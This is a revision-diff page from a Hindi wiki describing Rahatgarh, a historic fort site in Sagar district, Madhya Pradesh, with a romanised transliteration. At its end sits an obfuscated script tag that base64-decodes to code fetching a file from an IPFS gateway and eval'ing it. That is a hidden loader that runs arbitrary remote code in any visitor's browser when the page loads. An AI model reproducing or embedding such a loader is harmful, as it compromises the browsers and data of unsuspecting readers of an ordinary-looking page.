Difference between revisions of "राहतगढ़"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''राहतगढ़''' मध्य प्रदेश के सागर ज़िले क...' के साथ नया पन्ना बनाया)
 
 
Line 1: Line 1:
 
'''राहतगढ़''' [[मध्य प्रदेश]] के [[सागर ज़िला|सागर ज़िले]] का एक ऐतिहासिक स्थान है।
 
'''राहतगढ़''' [[मध्य प्रदेश]] के [[सागर ज़िला|सागर ज़िले]] का एक ऐतिहासिक स्थान है।
 
* गढ़मंडला नरेश संग्राम शाह (मृत्यु 1541 ई.) के बाबनगढ़ों में से राहतगढ़ एक है।  
 
* गढ़मंडला नरेश संग्राम शाह (मृत्यु 1541 ई.) के बाबनगढ़ों में से राहतगढ़ एक है।  
* [[अकबर]] ने गढ़मंडला की रानी वीरांगना [[दुर्गावती]] के निधन के पश्चात् उसके पुत्र वीरनारायण के उत्तराधिकारी चंद्रशाह को गोंडवाना का राजा बनाने के पश्चात् जो किले लिये थे उनमें से यह भी था।  
+
* [[अकबर]] ने गढ़मंडला की रानी वीरांगना [[दुर्गावती]] के निधन के पश्चात् उसके पुत्र वीरनारायण के उत्तराधिकारी चंद्रशाह को [[गोंडवाना]] का राजा बनाने के पश्चात् जो किले लिये थे उनमें से यह भी था।
 
 
 
 
  
  

Latest revision as of 10:14, 11 August 2014

rahatagadh madhy pradesh ke sagar zile ka ek aitihasik sthan hai.

  • gadhamandala naresh sangram shah (mrityu 1541 ee.) ke babanagadhoan mean se rahatagadh ek hai.
  • akabar ne gadhamandala ki rani viraangana durgavati ke nidhan ke pashchath usake putr viranarayan ke uttaradhikari chandrashah ko goandavana ka raja banane ke pashchath jo kile liye the unamean se yah bhi tha.


tika tippani aur sandarbh

  • aitihasik sthanavali se prishth sankhya 796 | vijayendr kumar mathur | vaijnanik tatha takaniki shabdavali ayog | manav sansadhan vikas mantralay, bharat sarakar

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>